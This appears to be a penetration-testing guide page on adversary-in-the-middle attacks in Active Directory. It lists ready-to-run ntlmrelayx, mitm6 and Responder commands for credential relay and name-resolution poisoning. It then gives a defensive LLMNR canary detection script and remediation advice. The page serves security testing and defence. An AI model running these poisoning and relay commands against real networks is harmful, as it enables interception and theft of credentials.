Adversary-In-The-Middle
Adversary-in-The-Middle (AiTM), also known as Man-in-The-Middle (MiTM), is where an attacker inserts themselves between two communicating parties to intercept, monitor, and potentially manipulate the communication.
AiTM is a popular attack path that many penetration testers attempt early in an internal penetration test against lower- and medium-maturity organizations. Many of the configurations exploited to obtain AiTM are Active Directory defaults, and some of the remediations can be hard to implement in practice.
I recommend reading the pages in this section to understand each tool and what it exploits, but here is an example of the three tools I run in this specific order:
Start impacket-ntlmrelayx to relay authentication traffic to other computers and create remote SOCKS sessions if successful:
impacket-ntlmrelayx -6 -wh [hostname].[domain] -tf [targets] -of socks -socks -smb2support
Start mitm6 to poison IPv6:
mitm6 -d [domain.com]
Start Responder to poison NBT-NS/LLMNR/mDNS:
responder -I eth0 -P
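The Responder step above works because hosts on the segment will answer LLMNR queries for names they do not own. The same property gives the blue team a cheap detection: query for a name that cannot exist and see whether anyone answers. The script below is an added example written for this page, not part of the original page or of any of the tools it lists. It builds a standard LLMNR query for a random canary name, sends it to the LLMNR multicast group, and parses any answers; a hit means a host is spoofing name resolution. The canary name format, the response parser and the sample packet used to exercise it are constructed for this example.

```python
"""LLMNR canary: detect a name-resolution poisoner on the local segment.

Added example for this page (not original content). Defensive check only:
it asks for a name that does not exist; a healthy network never answers,
so any answer points at a host spoofing LLMNR.
"""
import os
import socket
import struct

LLMNR_GROUP = "224.0.0.252"  # LLMNR IPv4 multicast group
LLMNR_PORT = 5355


def encode_name(name: str) -> bytes:
    """DNS-style label encoding: length-prefixed labels, terminated by 0."""
    out = b""
    for label in name.split("."):
        raw = label.encode("ascii")
        out += struct.pack("B", len(raw)) + raw
    return out + b"\x00"


def build_llmnr_query(name: str, txid: int) -> bytes:
    """Standard LLMNR query: DNS-like header with one A/IN question."""
    header = struct.pack("!HHHHHH", txid, 0, 1, 0, 0, 0)
    return header + encode_name(name) + struct.pack("!HH", 1, 1)


def decode_name(data: bytes, offset: int):
    """Decode labels at offset; follows a compression pointer if present."""
    labels = []
    while True:
        length = data[offset]
        if length == 0:
            return ".".join(labels), offset + 1
        if length & 0xC0 == 0xC0:  # compression pointer to an earlier name
            ptr = struct.unpack("!H", data[offset:offset + 2])[0] & 0x3FFF
            name, _ = decode_name(data, ptr)
            labels.append(name)
            return ".".join(labels), offset + 2
        labels.append(data[offset + 1:offset + 1 + length].decode("ascii"))
        offset += 1 + length


def parse_llmnr_response(data: bytes, txid: int, canary: str):
    """Return the A-record IPs if data answers our canary query, else []."""
    if len(data) < 12:
        return []
    rid, flags, qd, an, _, _ = struct.unpack("!HHHHHH", data[:12])
    if rid != txid or not flags & 0x8000:  # wrong transaction or not a response
        return []
    offset = 12
    for _ in range(qd):
        qname, offset = decode_name(data, offset)
        offset += 4  # skip QTYPE and QCLASS
        if qname.lower() != canary.lower():
            return []
    ips = []
    for _ in range(an):
        _, offset = decode_name(data, offset)
        rtype, _rclass, _ttl, rdlen = struct.unpack("!HHIH", data[offset:offset + 10])
        offset += 10
        rdata = data[offset:offset + rdlen]
        offset += rdlen
        if rtype == 1 and rdlen == 4:
            ips.append(socket.inet_ntoa(rdata))
    return ips


def probe(iface_ip: str = "0.0.0.0", timeout: float = 2.0):
    """Send one canary query and collect every host that answers it.

    Returns a list of (answering_host_ip, claimed_ips). Non-empty means a
    host on the segment is answering names it cannot legitimately own.
    """
    canary = "canary-" + os.urandom(4).hex()  # constructed, never a real host
    txid = struct.unpack("!H", os.urandom(2))[0]
    query = build_llmnr_query(canary, txid)
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
    sock.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_TTL, 1)
    sock.bind((iface_ip, 0))
    sock.settimeout(timeout)
    sock.sendto(query, (LLMNR_GROUP, LLMNR_PORT))
    hits = []
    try:
        while True:
            data, (src, _) = sock.recvfrom(1024)
            ips = parse_llmnr_response(data, txid, canary)
            if ips:
                hits.append((src, ips))
    except socket.timeout:
        pass
    finally:
        sock.close()
    return hits


if __name__ == "__main__":
    for src, ips in probe():
        print(f"ALERT: {src} answered LLMNR for a nonexistent name with {ips}")
```

Run it periodically from a sensor on each segment; the answering source address is the host to investigate. Because the canary is random, there is no benign reason for an answer, so the alert has essentially no false positives. The lasting fix remains disabling LLMNR and NBT-NS via group policy and requiring SMB signing so relayed authentication is rejected, which also blunts the ntlmrelayx step above.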